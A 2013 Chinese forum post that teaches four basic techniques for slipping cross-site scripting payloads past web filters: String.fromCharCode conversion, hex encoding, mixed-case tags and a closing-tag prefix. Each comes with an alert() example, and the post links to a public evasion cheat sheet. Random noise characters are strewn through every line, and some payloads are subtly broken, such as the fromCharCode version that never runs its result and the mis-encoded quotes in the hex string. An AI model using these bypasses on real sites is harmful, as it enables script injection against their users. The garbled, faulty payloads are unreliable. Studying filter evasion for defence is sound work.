四种超级基础的绕过方法。6 n% S! b, y; K/ |8 u
1.转换为ASCII码8 x. d: A3 U' l. }# Z q( u9 U8 D
例子:原脚本为<script>alert(‘I love F4ck’)</script >
# D5 C' [$ f$ L# c* A通过转换,变成:" v0 E) K# s+ N% C
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>8 ^+ G# P& d7 r
6 s' C0 k. d& u1 }( d( p, ~- D5 G9 I: O2.转换为HEX(十六进制)
3 s7 C. W H/ r, ?( d- a例子:原脚本为<script>alert(‘I love F4ck’)</script>, E& V( }0 L2 R& J
通过转换,变成:5 c$ D1 P8 O: i
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e: ^5 a- D+ {- Y$ N3 O% _! a
6 L1 j- q; S5 Z2 |$ M1 H/ X2 ^) y2 f3.转换脚本的大小写
9 O( b7 G! |5 k6 X @+ k4 F' L; c例子:原脚本为<script>alert(‘I love F4ck’)</script>" V1 b5 p+ I4 X, u' _
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>& s, o# W% b2 v2 d. L- e
! _0 f$ [2 y6 S9 q
4.增加闭合标记”>
: o; n7 E4 x2 @例子:原脚本为<script>alert(‘I love F4ck’)</script>' @( ?3 x3 \8 _) @2 t1 Q/ f, R7 Y
转换为:”><script>alert(‘I love F4ck’)</script>
, Y& E$ Y" E) O% u更详细绕过技术请参考此网页
# d+ l' i& D5 g+ A; vhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet' T7 r6 s" X2 c, T7 s ~( H
3 X% o/ a+ l. }2 `5 x5 X
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对